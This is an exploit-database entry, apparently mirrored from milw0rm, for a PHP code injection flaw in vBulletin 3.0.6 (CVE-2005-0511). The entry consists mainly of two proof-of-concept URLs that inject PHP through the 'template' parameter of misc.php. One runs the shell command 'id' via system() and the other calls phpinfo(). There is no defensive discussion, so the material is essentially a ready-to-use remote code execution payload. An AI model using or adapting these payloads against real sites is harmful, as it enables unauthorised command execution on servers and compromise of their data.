[] NeoSense
E X P L O I T S
title author type platform port cve id

vBulletin 3.0.6 - PHP Code Injection

Author: pokley
type: webapps
platform: php
port: 
date_added: 2005-02-21 
date_updated:  
verified: 1 
codes: OSVDB-14047;CVE-2005-0511 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.